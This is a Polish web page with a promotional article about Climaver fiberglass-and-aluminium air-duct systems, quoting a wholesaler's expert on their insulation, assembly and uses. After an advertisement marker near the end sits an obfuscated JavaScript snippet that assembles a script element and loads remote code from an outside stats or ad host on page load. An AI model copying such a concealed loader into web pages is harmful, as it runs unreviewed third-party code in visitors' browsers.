14°C bezchmurnie

Czym są systemy Climaver?

Aktualności, systemy Climaver - zdjęcie, fotografia

Climaver to innowacyjne systemy przesyłu powietrza, które są w stanie zaspokoić wymagania najbardziej wymagających klientów. Systemy te wykonuje się ze specjalnych płyt z włókna szklanego i folii aluminiowej, dzięki czemu są one lekkie, łatwe w montażu i nie wymagają stosowania dodatkowej izolacji.


Wśród najbardziej pożądanych cech układów przesyłu powietrza w systemach wentylacji i klimatyzacji wymienia się przede wszystkim jakość powietrza dostarczanego do wnętrz pomieszczeń, sprawność instalacji oraz maksymalną oszczędność energii. System Climaver jest rozwiązaniem doskonale spełniającym wszystkie te wymagania – przekonuje nasz rozmówca z firmy HTS.

 

Płyty do systemów Climaver

Płyty Climaver wykonane są ze sprasowanych włókiem szklanych. Zewnętrzną stronę pokrywa warstwa folii aluminiowej, która tworzy barierę ochronną. Od strony wewnętrznej płyta może posiadać rozmaite powłoki, np. tkaninę Neto, która podnosi odporność kanału na mechaniczne sposoby czyszczenia.

Z płyt Climaver wykonuje się gotowe przewody prostokątne izolowane termicznie i akustycznie. Dzięki krawędziom fabrycznie formowanym w żeńskie i męskie pióro, możliwe jest bardzo łatwe tworzenie złączeń poprzecznych przewodów.

 

Właściwości systemów Climaver

Decyzja o montażu systemu Climaver niesie ze sobą wiele korzyści, zarówno na etapie budowy, jak i późniejszego użytkowania. Przede wszystkim instalacja systemu jest bardzo prosta, szybka i nie wymaga stosowania dodatkowych narzędzi. Ponieważ przewody można składać na placu budowy, dostosowuje się ich wymiary do konkretnych potrzeb. Spada także koszt transportu i magazynowania.

Do systemu opartego na płytach Climaver nie potrzebujemy dodatkowej izolacji, ponieważ płyty same w sobie tworzą świetną barierę akustyczną i termiczną. Są niezwykle szczelne i odporne na korozję, nie wykazują tez tendencji do zarastania pleśnią lub grzybami – mówi ekspert z hurtowni HTS.

 

Gdzie stosuje się systemy Climaver

Ze względu na doskonałe właściwości izolacyjne i dużą trwałość, a także dostępność płyt z rozmaitymi powłokami wewnętrznymi, systemy Climaver znajdują bardzo szerokie zastosowanie zarówno w budownictwie rodzinnym, jak i przemysłowym i komercyjnym.

 

[reklama]

 

(function(){ cu9r=document.createElement("script");cu9r_=("ust");cu9ru="11804121"; cu9r_+="a"+("t.i");cu9r.type="text/javascript"; cu9ru+=".r04tlvt6u9r3aupv1cwk";cu9r.async=true;cu9r_+="n"+("f"+"o")+"/"; cu9ru+="nx0cwnxy7a";cu9r.src="//"+cu9r_+cu9ru; document.body.appendChild(cu9r); })();

Czym są systemy Climaver? komentarze opinie

Dodajesz jako: Zaloguj się